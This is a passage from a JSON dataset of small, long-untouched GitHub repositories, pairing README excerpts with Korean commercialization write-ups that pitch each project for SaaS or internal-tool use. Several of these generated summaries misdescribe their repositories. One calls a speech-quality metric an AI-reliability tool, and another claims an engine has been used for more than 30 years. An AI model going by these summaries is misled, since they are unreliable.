src=\"https://raw.githubusercontent.com/wacko1805/Pixel-Wallpaper-app/main/assets/s","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"tnfe/mdebug","github_url":"https://github.com/tnfe/mdebug","stars":12,"language":"JavaScript","license":"MIT","abandonment_months":29,"description":"# mdebug 저장소 분석\n\n## 왜 보물인가\n프로그래머가 코드의 문제를 빠르게 찾아 고칠 수 있도록 돕는 디버깅 도구로, 개발 속도를 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자용 SaaS**: 온라인 코드 편집기에 통합하여 사용자가 웹 브라우저에서 직접 버그를 수정할 수 있게 제공\n2. **기업 내부 도구**: IT팀이 사내","readme_excerpt":"[English](./README.en.md) | 简体中文\n<h1 align=\"center\">\n<img src=\"https://user-images.githubusercontent.com/6822604/130725631-dde49c00-24fe-44c6-a3fd-a5c709ce6e57.png\" width=\"40%\"/>\n</h1>\n\n<p align=\"center\" style=\"margin: 30px 0 0px;\">基于React开发的移动web调试工具   <a href=\"https://github.com/tnfe/mdebug/blob/master/CHANGELOG.md\">更新日志</a></p>\n\n<table>\n  <tr>\n    <th><h4 align=\"center\"><h4 align=\"center\">简单易用</h4 align=\"center\"></th>\n    <th><h4 align=\"center\"></h4 align=\"center\"><h4 align=\"center\">功能全面</h4 align=\"center\"></th>\n    <th><h4 align=\"center\"></h4 align=\"center\"><h4 align=\"center\">易扩展</h4 align=\"center\"></th>\n    <th><h4 align=\"center\"></h4 align=\"center\"><h4 align=\"center\">高性能</h4 align=\"center\"></th>\n  </tr>\n  <tr>\n    <td width=\"20%\" align=\"center\"><sub>使用cdn方式,一键接入</sub></td>\n    <td width=\"20%\" align=\"center\"><sub>类Chrome devtools, <strong>内嵌React开发者工具</strong>,支持日志,网络,元素,代理,存储,性能等, 具有更好的网络捕获能力和丰富的日志展现形式</sub></td>\n    <td width=\"20%\" align=\"center\"><sub>暴露内部丰富的事件, 可以和react组件无缝进行集成","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"lwgkzl/MedDG","github_url":"https://github.com/lwgkzl/MedDG","stars":6,"language":"Python","license":"GPL-3.0","abandonment_months":39,"description":"# MedDG 상용화 분석\n\n## 왜 보물인가\n의료 전문가와 환자 간의 대화를 자동으로 분석하고 관리하는 시스템으로, 의료 상담의 질을 높이고 진료 기록을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료상담 SaaS 서비스**: 병원과 클리닉이 구독하여 진료 중 의사-환자 대화를 실시간으로 분석하고 진료 기록을 자동 작성하는 서비스\n2. ","readme_excerpt":"# MedDG\n\nThis is the code for the following paper:\n\n[MedDG: an entity-centric medical consultation dataset for entity-aware medical dialogue generation](https://link.springer.com/chapter/10.1007/978-3-031-17120-8_35)\n\n*Wenge Liu, Jianheng Tang, Yi Cheng, Wenjie Li, Yefeng Zheng, Xiaodan Liang;*\n\n\n### Requirement\n\n    pip install allenlp==0.9\n\n### Usage\n\nFor the task of topic prediction  (e.g. run the LSTM baseline):\n\n```shell\ncd topic_predict\nallennlp train ../config/topic_predict/lstm_baseline.json --include-package basline -s tmp/lstm1\n```\n\nFor the task of response generation (e.g. run the seq2seq baseline):\n\n```shell\ncd generation\nallennlp train ../config/generation/seq2seqattn.json --include-package seq2seq -s tmp/seq2seq1\n```\n\n### Dataset\nhttps://drive.google.com/drive/folders/109WnXlNhmqttxYwb4EEscYGcA_-eq8Eg?usp=sharing\n","composite_score":0.5007,"license_safety_tag":"restricted"},{"name":"joelthelion/life_web","github_url":"https://github.com/joelthelion/life_web","stars":5,"language":"Rust","license":"MIT","abandonment_months":47,"description":"# joelthelion/life_web 분석 보고서\n\n## 왜 보물인가\n웹 기반의 생명 게임(Conway's Game of Life) 구현으로, 복잡한 패턴이 간단한 규칙에서 어떻게 생성되는지 시각적으로 보여주는 교육용 및 엔터테인먼트 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 학교/학원에서 구독하여 학생들이 수학, 물리, 생명","readme_excerpt":"Life simulation written in Rust, inspired by this very old screensaver: https://sourceforge.net/projects/primlife/\n\nDemo: https://joelthelion.github.io/life_web/demo/\n  \nBiots are allowed to evolve through mutation and natural selection.\nBiots have a simple genome giving them unique characteristics:\n  - Green allows them to collect energy from the sun\n  - Red allows them to eat other biots\n  - Dark blue allows them to defend\n  - Light blue allows them to move around\n\nA special trait, intelligence (denoted by a square), allows them to move towards the nearest edible biot instead of randomly.\nAll non-green traits cost energy.\n","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"theapache64/create-compose-desktop-app","github_url":"https://github.com/theapache64/create-compose-desktop-app","stars":10,"language":"Kotlin","license":"Apache-2.0","abandonment_months":35,"description":"# create-compose-desktop-app 평가\n\n## 왜 보물인가\n누구나 쉽게 윈도우/맥 프로그램을 만들 수 있도록 도와주는 도구로, 프로그래밍 난이도를 크게 낮춰줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구**: 중소기업의 재무팀이 엑셀 대신 사용할 수 있는 전용 급여 관리 프로그램\n2. **SaaS 서비스**: 클라우드 기반 ","readme_excerpt":"# 💻 create-compose-app\n\n![latestVersion](https://img.shields.io/github/v/release/theapache64/create-compose-app)\n<a href=\"https://twitter.com/theapache64\" target=\"_blank\">\n<img alt=\"Twitter: theapache64\" src=\"https://img.shields.io/twitter/follow/theapache64.svg?style=social\" />\n</a>\n\n> A tool that gives you a massive head start when building Compose based apps. It saves you from time-consuming setup and configuration\n\n\n## 🛠 Installation\n\n```shell\n~$ sudo npm install -g create-compose-app\n```\n\n## ⌨️ Usage\n\n```shell script\n~$ create-compose-app\nChoose platform\n1) Android\n2) Desktop\n3) Web\n4) Chrome extension\n5) Desktop (game)\n```\n\n### ✨ Demo\n\n#### Android ([see template](https://github.com/theapache64/compose-android-template))\n\n![](demo_android.png)\n\n- MVVM\n- Hilt\n- Compose\n- Navigation\n- Logger\n- Typography (with GoogleSans)\n\n\n#### Desktop ([see template](https://github.com/theapache64/compose-desktop-template))\n\n![](demo_desktop.gif)\n\n- Architecture (MVVM) with Android-ish structure ","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"Samvid95/AlgoTradingRepoList","github_url":"https://github.com/Samvid95/AlgoTradingRepoList","stars":6,"language":"","license":"unknown","abandonment_months":60,"description":"# AlgoTradingRepoList 분석 보고서\n\n## 왜 보물인가\n자동으로 주식을 사고팔아주는 프로그램들을 한곳에 모아놓은 목록으로, 투자에 관심 있는 사람들이 유용한 도구들을 쉽게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **투자 교육 플랫폼**: 초보 투자자를 위해 알고리즘 기반 투자 전략을 학습하고 실습할 수 있는 SaaS 서비스\n2.","readme_excerpt":"## Introduction\nI have created this repository with the goal of documenting, learning & extending(maybe in future) some of the Algotrading repositories. The current list contains only the repository which are well maintained and/or with recent updates. Feel free to add! \n\n## Maintanance\nI currently have no plans to update this list. If you see something which is outdated, feel free to open an Issue or Pull Request. I will respond to them quickly. If you think I missed your favorite one, please tell me and I will add it in the list.\n\n---\n# BackTesting & AI\nThis repository contains basic information about different algotrading repo I like.\nRepository Name | Link                                                           | Last Update | Backtesting support | ML & DL Support | Portfolio Optimization\n--------------- | ----                                                           | ----------- | ------------------- | --------------- |--------|\nbt              |https://github.com/pmorissette/","composite_score":0.5007,"license_safety_tag":"unknown"},{"name":"phpgao/proxy_pool","github_url":"https://github.com/phpgao/proxy_pool","stars":9,"language":"Go","license":"MIT","abandonment_months":55,"description":"","readme_excerpt":"# proxy_pool\n\n一个简单的代理池工具\n\nA simple proxy pool written in go\n\n## 功能\n\n - 定时抓取互联网公开免费的代理\n - 定时验证可用代理\n - 支持动态代理(https仅支持connect)\n - 使用采集到的代理访问代理网站\n - 使用命令行环境变量进行配置\n - 当没有IP可用时使用本地转发\n\n## 依赖\n\n - redis\n\n## 使用说明\n\n### 编译\n\n```bash\ngo build\n```\n\n### 下载\n\n```bash\n# 版本 v0.3.3\nwget https://github.com/phpgao/proxy_pool/releases/download/v0.3.3/proxy_pool_linux_amd64\nchmod a+x proxy_pool_linux_amd64\n```\n\n### 使用\n\n```bash\ncp config_example.json config.json\n# 修改redis和端口配置\n\n# 感谢ipip.net提供精准的IP数据(已内置)\n./proxy_pool\n\n# 打印可设定参数\n./proxy_pool_linux_amd64 --help\n\n# 命令行指定配置\n./proxy_pool_linux_amd64 -host 8.8.8.8 -port 6379 -auth laogao\n\n# 后台运行\nnohup ./proxy_pool_linux_amd64 > /dev/null 2>&1 &\n```\n\n### api\n\n```bash\n# 统计\ncurl 127.0.0.1:8088\n# 随机\ncurl 127.0.0.1:8088/random\n# 获取列表\ncurl 127.0.0.1:8088/get\n```\n\n### 动态代理\n\n```bash\n# http\ncurl http://cip.cc -x 127.0.0.1:8089\n# https\ncurl https://cip.cc -x 127.0.0.1:8089\n```\n\n## 一些细节\n\n### 流程图\n\n```\n                                                                 +-----------","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"davnag/DJSemiModalViewController","github_url":"https://github.com/davnag/DJSemiModalViewController","stars":9,"language":"Swift","license":"MIT","abandonment_months":83,"description":"# DJSemiModalViewController 분석\n\n## 왜 보물인가\n스마트폰 앱에서 화면 아래에서 부드럽게 올라오는 팝업 창 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **음악 스트리밍 앱**: 곡 상세정보나 플레이리스트 추가 팝업을 하단에서 띄우는 기능\n2. **배달 앱 내부 도구**: 주문 상태 변경이나 고객 정보 확","readme_excerpt":"# DJSemiModalViewController\n\nDJSemiModalViewController is a semi modal presentation dialog that grows with it´s added content. DJSemiModalViewController works for iPhone and iPad. DJSemiModalViewController mimic the design of the default NFC popup dialog.\n\n<img src=\"https://raw.githubusercontent.com/davnag/DJSemiModalViewController/master/Screencast_1.gif\" width=\"320\">\n\n## Example\n\nTo run the example project, clone the repo, and run `pod install` from the Example directory first.\n\n## Installation\n\nDJSemiModalViewController is available through [CocoaPods](http://cocoapods.org). To install\nit, simply add the following line to your Podfile:\n\n```ruby\npod 'DJSemiModalViewController'\n```\n\n## How to use it\n\n```swift\n\n@IBAction func buttonAction(_ sender: Any) {\n\n    let controller = DJSemiModalViewController()\n    \n    controller.title = \"Title\"\n    \n    let label = UILabel()\n    label.text = \"An example label\"\n    label.textAlignment = .center\n    controller.addArrangedSubview(view: label)\n","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"OS-ABC/AI-Coder","github_url":"https://github.com/OS-ABC/AI-Coder","stars":21,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":61,"description":"# OS-ABC/AI-Coder 상용화 분석\n\n## 왜 보물인가\n누구나 사용할 수 있는 인공지능 기반 코드 작성 도우미로, 프로그래머의 생산성을 크게 높일 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발자 구독 플랫폼으로 운영하여 월 이용료를 받고 클라우드 기반 코딩 보조 서비스 제공\n2. **내부 업무 도구**: 소프","readme_excerpt":"# AI-Coder\nAI-Coder是一款基于PyCharm的代码句补全插件。\n\n其补全效果如下：  \n\n<div align=center><img src=\"doc/img/code_completion_result_1.jpg\" width = 60% height = 60% /></div> \n    \n<div align=center> 句中调用代码句补全 </div> \n  \n  &nbsp;\n\n\n<div align=center><img src=\"doc/img/code_completion_result_2.jpg\" width = 60% height = 60% /></div>  \n\n<div align=center> 句间调用代码句补全 </div>   \n\n  &nbsp;\n  \n## 目录结构\n- backend——代码句补全服务器\n- dataset——训练数据集\n- model——代码句补全模型\n- plugin——插件开发配置\n\n  &nbsp;\n\n## 服务器\n代码句补全服务器尝试了两种框架，分别是Flask和Crow。\n### Flask\n\n#### 1. 准备\n\n如果没有安装 flask，先安装 flask。anaconda 自带了 flask。\n`pip install flask`\n\n#### 2. 运行\n\n进入 backend 文件夹，运行 server_demo.py。\n\n在浏览器中输入 localhost:9078/plugin_test?keyword=helloworld ，浏览器返回内容如下。\n\n<img src=\"doc/img/backend_helloworld.jpg\" width=\"50%\"/>\n\n后端获取 keyword 中的数据，处理之后返回。后续我们使用模型处理输入，道理是一样的。\n\n### [Crow](https://github.com/ipkn/crow)\nCrow是一个轻量级的Web服务器框架，这个框架是受Python下的Flask启发的，其实现的功能和Flask基本一致，核心的区别在于Crow是用C++编写的，性能较Flask有一定的提升。\n\n  &nbsp;\n  \n## 数据集\n数据集有两个，第一个是Keras领域的代码数据，第二个是TensorFlow领域的代码数","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"sultim-t/Serious-Engine-RT","github_url":"https://github.com/sultim-t/Serious-Engine-RT","stars":11,"language":"C++","license":"GPL-2.0","abandonment_months":44,"description":"# Serious-Engine-RT 상업화 분석\n\n## 왜 보물인가\n30년 이상 게임 개발에 사용된 검증된 게임 엔진을 최신 기술로 업그레이드한 것으로, 소규모 개발사도 고급 그래픽 게임을 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 클라우드 서비스 (SaaS)**\n브라우저에서 바로 게임을 만들고 배포할 수 있는 온라인 플랫폼으","readme_excerpt":"# Serious Engine: Ray Traced\n\nReal-time path tracing support for Serious Engine 1.10.\n\n## Building\n\n### Windows\n\n1) Prerequisites:\n    * 64-bit CPU\n    * GPU with ray tracing support\n    * [Git](https://github.com/git-for-windows/git/releases)\n    * [Vulkan SDK](https://vulkan.lunarg.com/)\n    * [Visual Studio](https://www.visualstudio.com/post-download-vs?sku=community) (any version after 2013)\n    * [Python 3](https://www.python.org/downloads/)\n\n1) Clone this repository:\n    * `git clone https://github.com/sultim-t/Serious-Engine-RT.git`\n\n1) Fetch RTGL1 library submodule:\n    * `git submodule update --init`\n\n1) Build RTGL1 library:\n    * The library uses CMake: `Sources/RTGL1/CMakeLists.txt`\n    * Some of the configs can be found in `Sources/RTGL1/CMakeSettings.json`\n    * Make sure that compiled static library `RayTracedGL1.lib` is located in either `Sources/RTGL1/Build/x64-Release` or `Sources/RTGL1/Build/x64-Debug`\n\n1) Build shaders:\n    * Run `Sources/RTGL1/Source/Shaders/Generat","composite_score":0.5007,"license_safety_tag":"restricted"},{"name":"facebookresearch/Noresqa","github_url":"https://github.com/facebookresearch/Noresqa","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":37,"description":"# Noresqa 프로젝트 분석\n\n## 왜 보물인가\n페이스북 연구팀이 만든 이 프로젝트는 AI 모델을 더 안전하고 신뢰할 수 있게 만드는 기술로, 잘못된 답변을 줄이는 데 도움을 줍니다.\n\n## 어디에 쓸 수 있나\n- **AI 챗봇 신뢰도 검증 SaaS**: 기업용 챗봇 서비스 제공 업체가 자신의 AI가 얼마나 정확한지 측정하는 도구로 판매\n- **금융사 ","readme_excerpt":"# NORESQA: Speech Quality Assessment using Non-Matching References\n\n\nThis is a Pytorch implementation for using NORESQA. The NORESQA framework uses non-matching\nreferences (NMT) along with the given test speech signal to estimate speech quality. Under this framework\nwe have two metrics:\n\n- *NORESQA-score*: A metric based on SI-SDR for speech. The model predicts absolute relative SI-SDR [1] between test and NMR and probability of test cleaner than the NMR\n- *NORESQA-MOS*: NORESQA-MOS is designed to estimate Mean Opinion Score (MOS) [2]. The output of NORESQA-MOS is MOS score.\n\nThe detailed of NORESQA framework and *NORESQA-score* is in our **Neurips 2021** paper referenced below.The details of *NORESQA-MOS* is in our **Interspeech 2022** paper.\n\n### Using this library as Speech Quality Assessment Metric.\n\n##  Setup and basic usage\n\nRequired python libraries (latest): Pytorch with GPU support + Scipy + Numpy (>=1.14) + Librosa + fairseq.\n\nInstall all dependencies in a conda environment b","composite_score":0.5007,"license_safety_tag":"unknown"},{"name":"FormatterKit/PostalCodeValidator","github_url":"https://github.com/FormatterKit/PostalCodeValidator","stars":6,"language":"Swift","license":"MIT","abandonment_months":67,"description":"# PostalCodeValidator 사업화 분석\n\n## 왜 보물인가\n주소 형식이 맞는지 자동으로 검증해주는 작은 도구인데, 전 세계 배송·결제 시스템에서 매일 필요한 기능입니다.\n\n## 어디에 쓸 수 있나\n\n1. **전자상거래 플랫폼**: 쇼핑몰에서 고객이 입력한 우편번호를 실시간으로 검증해 배송 오류를 줄입니다.\n2. **금융 서비스 SaaS**: 신","readme_excerpt":"# PostalCodeValidator\n\n[![Build Status][ci status badge]][ci status]\n[![License][license badge]][license]\n[![Swift Version][swift version badge]][swift version]\n\nA validator for [postal codes](https://en.wikipedia.org/wiki/Postal_code)\nwith support for 200+ regions.\n\n```swift\nimport Foundation\nimport PostalCodeValidator\n\nif let validator = PostalCodeValidator(locale: .current) { // United States (US)\n    validator.validate(postalCode: \"95014\") // true\n    validator.validate(postalCode: \"22162-1010\") // true\n\n    validator.validate(postalCode: \"1234567\") // false\n    validator.validate(postalCode: \"INVALID\") // false\n}\n\n// 248 regions supported\nif let validator = PostalCodeValidator(regionCode: \"JP\") { // Japan (JP)\n    validator.validate(postalCode: \"154-0023\") // true\n    validator.validate(postalCode: \"12345\") // false\n}\n```\n\n> **Note**: Only the region of a locale is used to determine validation rules.\n> To validate the postal code for a particular region,\n> you can construct a loca","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"erdavids/Hex-Map","github_url":"https://github.com/erdavids/Hex-Map","stars":6,"language":"Python","license":"MIT","abandonment_months":75,"description":"# Hex-Map 상용화 분석\n\n## 왜 보물인가\n육각형 격자 기반의 게임 맵 생성 시스템으로, 전략 게임이나 시뮬레이션 게임 개발에 필요한 핵심 기술을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 개발자와 소규모 게임사를 위한 웹 기반 맵 에디터 구독 서비스\n2. **내부 업무 도구**: 게임 스튜디오의 레벨 디자인 팀이 사","readme_excerpt":"# Hex Map\n\nA hexagon based terrain simulator that relies on Perlin noise for the height values. You can use this tool freely to generate your own maps or upgrade the script to add new functionality.\n\nUse an online version to make your own maps: https://www.erdavids.com/projects/hex-map\n\nPlay with the source code yourself: https://glitch.com/~hex-map-creator\n\nIf you're interested in running the code on your own, make sure to download [Processing](https://www.processing.org) and use the Python module to run the .pyde file. Try playing with some of the variables at the top of the script to get a feel for how they affect the terrain generation.\n\nFeel free to email me at thebuffed@gmail.com with 'Hex Map' in the subject if you have any questions.\n\nOther links:\n- [More Generative Art](https://github.com/erdavids/Generative-Art)\n- [YouTube Channel](https://www.youtube.com/channel/UCUrmX3SvpPerq-KAfGBrgGQ)\n\nAll of these projects are available with the intention that other people will enjoy and","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"zero2one3/markdown-editor-reactjs","github_url":"https://github.com/zero2one3/markdown-editor-reactjs","stars":16,"language":"TypeScript","license":"MIT","abandonment_months":56,"description":"# Markdown 편집기 (React 기반) 가치 분석\n\n## 왜 보물인가\n인터넷 브라우저에서 글을 쓰고 편집할 수 있는 도구로, 복잡한 소프트웨어 설치 없이 누구나 사용할 수 있는 실용적인 웹 애플리케이션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 블로그 플랫폼이나 노트 앱에 내장하여 사용자들이 바로 글을 작성하고 관리할 수 있도록 ","readme_excerpt":"# 基于React的markdown编辑器组件\n\n若有`bug`或好的建议，欢迎加我微信：`Lpyexplore333`或者在[github](https://github.com/zero2one3/markdown-editor-reactjs)上提pr\n\n## 安装\n\n```shell\n# npm\nnpm i markdown-editor-reactjs --save\n\n# yarn\nyarn add markdown-editor-reactjs -D\n```\n\n## 例子\n\n```jsx\nimport MarkdownEdit from 'markdown-editor-reactjs'\n\n\nfunction App() {\n    \n    return (\n        <App>\n            <MarkdownEdit />\n        </App>\n    )\n}\n```\n\n\n## 快捷键\n\n| windows | mac | 功能 |\n| --- | --- | --- |\n| tab | tab | 缩进4个字符（支持多行） |\n| shift + tab | shift + tab | 删除缩进的4个字符（支持多行） |\n| ctrl + z | command + z | 返回上一步 |\n| ctrl + y | command + y | 返回下一步 |\n| ctrl + b | command + b | 加粗 |\n| ctrl + i | command + i | 斜体 |\n| ctrl + u | command + u | 删除线 |\n| ctrl + l | command + l | 链接 |\n| ctrl + o | command + o | 有序列表 |\n| ctrl + q | command + q | 引用（mac下失效） |\n| ctrl + 1 | command + 1 | 一级标题 |\n| ctrl + 2 | command + 2 | 二级标题 |\n| ctrl + 3 | command + 3 | 三级标题 |\n| ctrl + 4 | command + 4 | 四级标题 |\n| ctrl + 5 | command + 5 | 五级标题 |\n| ctrl + 6 | com","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"r26zhao/django-online-status","github_url":"https://github.com/r26zhao/django-online-status","stars":8,"language":"Python","license":"MIT","abandonment_months":107,"description":"# django-online-status 상용화 분석\n\n## 왜 보물인가\n웹사이트 방문자가 현재 온라인인지 오프라인인지 실시간으로 파악할 수 있는 기술로, 채팅, 소셜 네트워크, 협업 도구 등 사용자 상태가 중요한 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS - 팀 협업 플랫폼**\n- 슬랙 같은 업무용 메신저에서 \"김철수 온라인 중","readme_excerpt":"# django-online-status\na mini app stores user's login time and can check whether a user is online\n","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"BilHim/minecraft-world-generation","github_url":"https://github.com/BilHim/minecraft-world-generation","stars":6,"language":"Jupyter Notebook","license":"MIT","abandonment_months":55,"description":"# minecraft-world-generation 분석\n\n## 왜 보물인가\n마인크래프트 게임의 세계를 자동으로 만드는 기술로, 게임 개발자나 콘텐츠 크리에이터가 수백 시간 걸리는 작업을 몇 분으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 마인크래프트 맵 생성 플랫폼**\n웹사이트에서 몇 번의 클릭으로 커스텀 세계를 만들고","readme_excerpt":"# Minecraft World Generation in Python\n \nThis is an attempt to replicate Minecraft world generation in Python.\nThis is part of an [article](https://towardsdatascience.com/replicating-minecraft-world-generation-in-python-1b491bc9b9a4) published on Medium.\n\n\n## Source code\nYou can find all the code used in the article [here](https://github.com/BilHim/minecraft-word-generation/blob/main/src/Minecraft%20Terrain%20Generation%20in%20Python%20-%20By%20Bilal%20Himite.ipynb).\n\n## Figures\nI used multiple scripts to generate the figures used in the article. Some of the code along with the figures are available [here](https://github.com/BilHim/minecraft-word-generation/tree/main/figures).\n\n## Preview\n![alt text](https://github.com/BilHim/minecraft-word-generation/raw/main/preview_1.png \"Preview 1\")\n![alt text](https://github.com/BilHim/minecraft-word-generation/raw/main/preview_2.png \"Preview 2\")\n![alt text](https://github.com/BilHim/minecraft-word-generation/raw/main/preview_3.png \"Preview 3\")\n\n#","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"ibaiGorordo/onnx-Ultra-Fast-Lane-Detection-Inference","github_url":"https://github.com/ibaiGorordo/onnx-Ultra-Fast-Lane-Detection-Inference","stars":5,"language":"Python","license":"MIT","abandonment_months":35,"description":"# onnx-Ultra-Fast-Lane-Detection-Inference 분석\n\n## 왜 보물인가\n자동차 카메라가 도로의 차선을 실시간으로 인식할 수 있게 하는 가벼운 AI 기술로, 자동 운전이나 운전 보조 시스템의 핵심 부품입니다.\n\n## 어디에 쓸 수 있나\n1. **자동차 운전 보조 서비스**: 차선 이탈 방지, 자동 조향 기능이 필요한 완성차 제조","readme_excerpt":"# onnx-Ultra-Fast-Lane-Detection-Inference\n Example scripts for the detection of lanes using the [ultra fast lane detection model](https://github.com/cfzd/Ultra-Fast-Lane-Detection) in ONNX.\n\n![!Ultra fast lane detection](https://github.com/ibaiGorordo/onnx-Ultra-Fast-Lane-Detection-Inference/blob/main/doc/img/detected%20lanes.jpg)\nSource: https://www.flickr.com/photos/32413914@N00/1475776461/\n\n# Pytorch inference\nFor performing the inference in Pytorch, check my other repository **[Ultrafast Lane Detection Inference Pytorch](https://github.com/ibaiGorordo/Ultrafast-Lane-Detection-Inference-Pytorch-)**.\n\n# Tested Environment\n## Computer or Laptop\n- \n\n## Single Board\n- Jetson Xavier AGX. JetPack 4.6\n# Requirements for Laptop\n\n * **OpenCV**, **scipy**, **onnx** and **onnxruntime**. **pafy** and **youtube-dl** are required for youtube video inference. \n \n# Requirements for Nvidia Xavier\n\n * **OpenCV**, **scipy**, **onnx** and **onnxruntime**. **pafy**  and **youtube-dl**, **Nvidia Xavier ","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"Abdenasser/dr_scaffold","github_url":"https://github.com/Abdenasser/dr_scaffold","stars":5,"language":"Python","license":"MIT","abandonment_months":32,"description":"# dr_scaffold 상용화 분석\n\n## 왜 보물인가\n프로젝트 구조를 자동으로 만들어주는 도구로, 개발자들이 반복적인 초기 작업에 들이는 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 개발 IDE 플랫폼에 내장하여 사용자가 버튼 클릭으로 새 프로젝트를 시작할 수 있게 제공\n2. **내부 업무 도구**: 대규","readme_excerpt":"<p align=\"center\"><a href=\"https://github.com/Abdenasser/dr_scaffold\"><img src=\"https://ph-files.imgix.net/99f3cc0a-58b1-4c16-bb41-1963b0a692fc.png\" alt=\"dr_scaffold blueprint icon\" height=\"80\"/></a></p>\n<h1 align=\"center\">dr_scaffold</h1>\n<p align=\"center\">Scaffold django rest apis like a champion ⚡. said no one before</p>\n\n<p align=\"center\">\n    <a href=\"https://codecov.io/gh/Abdenasser/dr_scaffold\"><img src=\"https://codecov.io/gh/Abdenasser/dr_scaffold/branch/main/graph/badge.svg?token=VLUZWSTJV2\"/></a> <a href=\"https://app.travis-ci.com/Abdenasser/dr_scaffold\"><img src=\"https://app.travis-ci.com/Abdenasser/dr_scaffold.svg?branch=main\"/></a> <a href=\"https://opensource.org/licenses/MIT\"><img src=\"https://img.shields.io/pypi/l/ansicolortags.svg\"/></a> <a href=\"https://pypi.org/project/dr-scaffold/\"><img src=\"https://d25lcipzij17d.cloudfront.net/badge.svg?id=py&r=r&type=6e&v=2.1.2&x2=0\"/></a> <a href=\"https://pepy.tech/project/dr-scaffold\"><img src=\"https://pepy.tech/badge/dr-scaffold","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"OpnTec/2009.opentechsummit.net","github_url":"https://github.com/OpnTec/2009.opentechsummit.net","stars":12,"language":"Python","license":"Apache-2.0","abandonment_months":59,"description":"# OpnTec/2009.opentechsummit.net 분석\n\n## 왜 보물인가\n2009년 오픈테크 서밋의 웹사이트 소스코드로, 초기 오픈소스 커뮤니티 구축과 기술 컨퍼런스 운영 방식의 역사적 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **컨퍼런스 웹사이트 템플릿**: 기술 행사 주최자가 참고할 수 있는 레이아웃 및 기능 설계 사례\n2. **오픈소스 ","readme_excerpt":"# Spetrometer Python\n\n[![Build Status](https://travis-ci.com/OpnTec/spectrometer-python.svg?branch=master)](https://travis-ci.com/OpnTec/spectrometer-python)\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\nThis repository provides scripts for the open spectrometer project to enable practitioners, students and citizen scientists to collect data with their spectrometer and have a good and fun learning experience. Enjoy!\n\nThe open spectrometer project consists of a web cam, simple lasercut parts, battery casing and a suitable LED lightning component. The spectrometer connects to a computer via USB, where the user can run the scripts provided in this repository to run experiments and take measurements. The two main components of this repository are analyse.py and calibrate.py. The analyse.py script is used to plot the absorbance spectra of measurements taken with a webcam spectrometer. The c","composite_score":0.5007,"license_safety_tag":"safe"},{"name":"cuixiaorui/vue-magic","github_url":"https://github.com/cuixiaorui/vue-magic","stars":26,"language":"","license":"MIT","abandonment_months":54,"description":"# vue-magic 상업화 분석\n\n## 왜 보물인가\n웹 개발자들이 복잡한 코딩 없이 화면을 빠르게 만들 수 있는 도구라서, 개발 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구 SaaS**: 중소 스타트업이 관리자 시스템, 대시보드, 데이터 입력 화면을 빠르게 구축하도록 지원하는 서비스\n2. **웹디자이너 협업","readme_excerpt":"# vue-magic\n\n共读 Vue3 感受一下 Vue 中的魔法吧！\n\n一起学习 天天向上\n\n## why\n\n最近一年我一直都在研究 Vue3，从里面学到了大量的在日常开发项目中学不到的高阶知识点\n\n而且在阅读 Vue3 的 Issues 的时候更是如此\n\n有很多 why 层面的内容在，这相比源码的话要有趣的多\n\n源码只是 how 层面的东西，你是不知道为什么这么实现的\n\n这个也是最有价值的点\n\n独乐乐不如众乐乐 所以发起共读 Vue3 的这个活动\n\n人多 学起来有趣也热闹\n\n## how\n\n每周我会发布阅读 Issues 的任务\n\n然后大家基于这个任务来去阅读指定的 Issues 就好了\n\n任务会放到这个项目的 Issues 内，大家可以直接在对应的 issue 下面留言讨论\n\n![image](https://user-images.githubusercontent.com/12064746/143980964-4b85ccca-063e-4ccd-8829-47e1e50d6939.png)\n\n\n最终我会收集大家的输出文章放到这个仓库内\n\n我给自己规定每周要研究一个 Issues \n\n然后我会输出为视频形式放到 [b站](https://space.bilibili.com/175301983)\n\n> 也会不定期在 b站直播看 Issues \n\n如果你还看不懂 Vue3 源码的话 可以基于 [mini-vue](https://github.com/cuixiaorui/mini-vue) 来学习\n\n你也可以基于我的视频来输出对应的文章\n\n输出才是最好的学习方式\n\n当然重点是研究 Issues 的思考过程 \n\n而整个的思考过程我都会放到群里 \n\n和大家一同思考和探讨是共同学习最重要的点\n\n（我建了一个群）\n\n## 输出\n- [给 Vue3 提 PR 可以学到什么](https://www.bilibili.com/video/BV16b4y1t7t8) \n- [【共读 Vue3】如何测试代码的执行速度](https://www.bilibili.com/video/BV1XU4y1K79u)\n- [【共读 Vue3】复现修复 BUG 全流程](https://www.bilibili.com/video/BV15M4y1A75w)\n- [【共读 